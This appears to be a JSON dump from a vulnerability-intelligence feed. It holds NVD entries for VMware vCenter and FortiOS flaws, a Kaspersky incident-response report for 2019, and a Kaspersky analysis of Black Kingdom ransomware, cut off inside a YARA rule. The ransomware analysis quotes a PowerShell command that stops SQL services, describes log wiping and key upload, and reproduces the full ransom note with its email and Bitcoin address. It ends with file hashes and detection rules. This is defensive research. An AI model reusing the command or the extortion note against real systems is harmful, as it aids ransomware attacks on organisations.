["CVE-2021-21972"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2021-21972", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3k:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3j:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update1:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3g:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update3:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:update2a:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:54:32", "description": "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-04T21:29:00", "type": "cve", "title": "CVE-2018-13379", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-06-03T11:15:00", "cpe": ["cpe:/o:fortinet:fortios:6.0.4", "cpe:/o:fortinet:fortios:5.6.7"], "id": "CVE-2018-13379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13379", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fortinet:fortios:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:fortinet:fortios:5.6.7:*:*:*:*:*:*:*"]}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques used in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware's presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims' environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story "[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)".\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nBy linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks. \nSometimes we act as complimentary experts for a primary incident response team from the victim's organization and we have no information on all of their findings \u2013 hence the 'Unknown reasons' on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that's not showing distrubution of 0- to 1-day vulnerabilities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nThe distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization's network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools which can't be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.\n\nLet's weight those tools based on occurrence in incidents \u2013 we will also see tactics (MITRE ATT&CK) where they are usually applied.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.\n\n**MS17-010** _SMB service in Microsoft Windows_ \nRemote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. | **CVE-2019-0604** _Microsoft Sharepoint_ \nRemote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. | **CVE-2019-19781** _Citrix Application Delivery Controller & Citrix Gateway_ \nThis vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. \n---|---|--- \n**CVE-2019-0708** _RDP service in Microsoft Windows_ \nRemote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. | **CVE-2018-7600** _Drupal_ \nRemote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. | **CVE-2019-11510** _Pulse Secure SSL VPN_ \nUnauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. \n \n## Attack duration\n\nFor a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary's activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n**Rush hours or days** | **Average weeks** | **Long-lasting months or longer** \n---|---|--- \nThis category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. \nIn some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary's activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. \nSuch attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. \n**Common threat:** \nRansomware infection | **Common threat:** \nFinancial theft | **Common threat:** \nCyber-espionage and theft of confidential data \n**Common attack vector:**\n\n * Downloading of a malicious file by link in email\n * Downloading of a malicious file from infected site\n * Exploitation of vulnerabilities on network perimeter\n * Credentials brute-force attack\n| **Common attack vector:**\n\n * Downloading a malicious file by link in email\n * Exploitation of vulnerabilities on network perimeter\n| **Common attack vector:**\n\n * Exploitation of vulnerabilities on network perimeter \n**Attack duration (median):** \n1 day | **Attack duration (median):** \n10 days | **Attack duration (median):** \n122 days \n**Incident response duration:** \nHours to days | **Incident response duration:** \nWeeks | **Incident response duration:** \nWeeks \n \n## Operational metrics\n\n### False positives rate\n\nFalse positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn't have a specialist in threat hunting or they are managed by an external SOC that doesn't have the full context for an event.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)\n\n## How long response took\n\nDistribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)\n\n## **MITRE ATT&CK tactics and techniques**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)\n\n## Conclusion\n\nIn 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.\n\nImproved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.\n\nVarious tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.\n\nAdversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.\n\nApplying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.", "cvss3": {}, "published": "2020-08-06T10:00:34", "type": "securelist", "title": "Incident Response Analyst Report 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781"], "modified": "2020-08-06T10:00:34", "id": "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "href": "https://securelist.com/incident-response-analyst-report-2019/97974/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-17T10:31:39", "description": "\n\nBlack Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).\n\nThe complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and a possibility to recover files encrypted with Black Kingdom with the help of the hardcoded key. The industry already [provided a script](<https://blog.cyberint.com/black-kingdom-ransomware>) to recover encrypted files in case they were encrypted with the embedded key.\n\n## Background\n\nThe use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as [ProxyLogon](<https://proxylogon.com/>) was [publicly reported](<https://twitter.com/vikas891/status/1373282066603859969>) at the end of March.\n\nAround the same time, we published a story on another ransomware family used by the attackers after successfully exploiting vulnerabilities in Microsoft Exchange Server. The ransomware family was DearCry.\n\nAnalysis of Black Kingdom revealed that, compared to others, it is an amateurish implementation with several mistakes and a critical encryption flaw that could allow decrypting the files due to the use of a hardcoded key. Black Kingdom is not a new player: it was observed in action following other vulnerability exploitations in 2020, such as CVE-2019-11510.\n\n**Date** | **CVE** | **Product affected** \n---|---|--- \nJune 2020 | CVE-2019-11510 | Pulse Secure \nMarch 2021 | CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | Microsoft Exchange Server \n \n## Technical analysis\n\n### Delivery methods\n\nBlack Kingdom's past activity indicates that ransomware was used in larger vulnerability exploitations campaigns related to Pulse Secure or Microsoft Exchange. [Public reports](<https://twitter.com/malwaretechblog/status/1373648027609657345>) indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.\n\n### Sleep parameters\n\nThe ransomware can be executed without parameters and will start to encrypt the system, however, it is possible to to run Black Kingdom with a number value, which it will interpret as the number of seconds to wait before starting encryption.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png>)\n\n**_'Sleep' parameter used as an argument_**\n\n### Ransomware is written in Python\n\nBlack Kingdom is coded in Python and compiled to an executable using PyInstaller. While analyzing the code statically, we found that most of the ransomware logic was coded into a file named _0xfff.py_. The ransomware is written in Python 3.7.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png>)\n\n**_Black Kingdom is coded in Python_**\n\n### Excluded directories\n\nThe adversary behind Black Kingdom specified certain folders to be excluded from encryption. The purpose is to avoid breaking the system during encryption. The list of excluded folders is available in the code:\n\n * Windows,\n * ProgramData,\n * Program Files,\n * Program Files (x86),\n * AppData/Roaming,\n * AppData/LocalLow,\n * AppData/Local.\n\nThe code that implements this functionality demonstrates how amateurishly Black Kingdom is written. The developers failed to use OS environments or regex to avoid repeating the code twice.\n\n### PowerShell command for process termination and history deletion\n\nPrior to file encryption, Black Kingdom uses PowerShell to try to stop all processes in the system that contain "sql" in the name with the following command:\n \n \n Get-Service*sql*|Stop-Service-Force2>$null\n\nOnce done, Black Kingdom will delete the PowerShell history in the system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png>)\n\n**_PowerShell commands run by Black Kingdom_**\n\nCombined with a cleanup of system logs, this supports the theory that the attackers try to remain hidden in the system by removing all traces of their activity.\n\n### Encryption process\n\nThe static analysis of Black Kingdom shows how it generates an AES-256 key based on the following algorithm.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png>)\n\n**_The pseudo-algorithm used by Black Kingdom_**\n\nThe malware generates a 64-character pseudo-random string. It then takes the MD5 hash of the string and uses it as the key for AES-256 encryption.\n\nThe code contains credentials for sending the generated key to the third-party service hxxp://mega.io. If the connection is unsuccessful, the Black Kingdom encrypts the data with a hardcoded key available in the code.\n\nBelow is an example of a successful connection with hxxp://mega.io.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png>)\n\n**_Connection established with mega.io_**\n\n** **The credentials for mega.io are hardcoded in base64 and used for connecting as shown below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png>)\n\n**_Hardcoded credentials_**\n\nThe file sent to Mega contained the following data.\n\n**Parameter** | **Description:** \n---|--- \nID: | Generated ID for user identification \nKey: | Generated user key \nUser: | Username in the infected system \nDomain: | Domain name to which the infected user belongs \n \nBlack Kingdom will encrypt a single file if it is passed as a parameter with the key to encrypt it. This could allow the attacker to encrypt one file instead of encrypting the entire system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png>)\n\n**_Function for encrypting a single file_**\n\nIf no arguments are used, the ransomware will start to enumerate files in the system and then encrypt these with a ten-threaded process. It performs the following basic operations:\n\n 1. Read the file,\n 2. Overwrite it with an encrypted version,\n 3. Rename the file.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png>)\n\n**_The function used for encrypting the system_**\n\nBlack Kingdom allows reading a file in the same directory called target.txt, which will be used by the ransomware to recursively collect files for the collected directories specified in that file and then encrypt them. Black Kingdom will also enumerate various drive letters and encrypt them. A rescue note will be delivered for each encrypted directory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png>)\n\n**_Rescue note used by the ransomware_**\n\n### Encryption mistakes\n\nAmateur ransomware developers often end up making mistakes that can help decryption, e.g., poor implementation of the encryption key, or, conversely, make recovery impossible even after the victim pays for a valid decryptor. Black Kingdom will try to upload the generated key to Mega, and if this fails, use a hardcoded key to encrypt the files. If the files have been encrypted and the system has not been able to make a connection to Mega, it will be possible to recover the files using the hardcoded keys.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png>)\n\n**_Hardcoded key in Base64_**\n\nWhile analyzing the code statically, we examined the author's implementation of file encryption and found several mistakes that could affect victims directly. During the encryption process, Black Kingdom does not check whether the file is already encrypted or not. Other popular ransomware families normally add a specific extension or a marker to all encrypted files. However, if the system has been infected by Black Kingdom twice, files in the system will be encrypted twice, too, which may prevent recovery with a valid encryption key.\n\n### System log cleanup\n\nA feature of Black Kingdom is the ability to clean up system logs with a single Python function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png>)\n\n**_The function that cleans up system logs_**\n\nThis operation will result in Application, Security, and System event viewer logs being deleted. The purpose is to remove any history of ransomware activity, exploitation, and privilege escalation.\n\n### Ransomware note\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard with pyHook as it does so.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png>)\n\n**_Function to hook the mouse and keyboard_**\n\nWritten in English, the note contains several mistakes. All Black Kingdom notes contain the same Bitcoin address; sets it apart from other ransomware families, which provide a unique address to each victim.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nThe associated Bitcoin address is currently showing just two transactions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png>)\n\n**_Transactions made to a Bitcoin account_**\n\n### Code analysis\n\nAfter decompiling the Python code, we found that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on Github](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>).\n\nThe adversary behind Black Kingdom adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key or communication with the mega.io domain.\n\n## Victims\n\nBased on our telemetry we could see only a few hits by Black Kingdom in Italy and Japan.\n\n## Attribution\n\nWe could not attribute Black Kingdom to any known adversary in our case analysis. Its involvement in the Microsoft Exchange exploitation campaign suggests opportunism, rather than a resurgence in activity from this ransomware family.\n\nFor more information please contact: [financialintel@kaspersky.com](<mailto:financialintel@kaspersky.com>)\n\n## Appendix I \u2013 Indicators of Compromise\n\n**_Note:_**_ The indicators in this section were valid at the time of publication. Any future changes will be directly updated in the corresponding .ioc file._\n\n**File Hashes**\n\nb9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f \nc4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908 \na387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287 \n815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670 \n910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db \n866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc \nc25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n\n**Domain:**\n\nhxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn\n\n**YARA rules:**\n \n \n import \"hash\"\n import \"pe\"\n rule ransomware_blackkingdom {\n \n meta:\n \n description = \"Rule to detect Black Kingdom ransomware\"\n author = \"Kaspersky Lab\"\n copyright = \"Kaspersky Lab\"\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\n version = \"1.0\"\n last_modified = \"2021-05-02\"\n hash = \"866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\"\n hash = 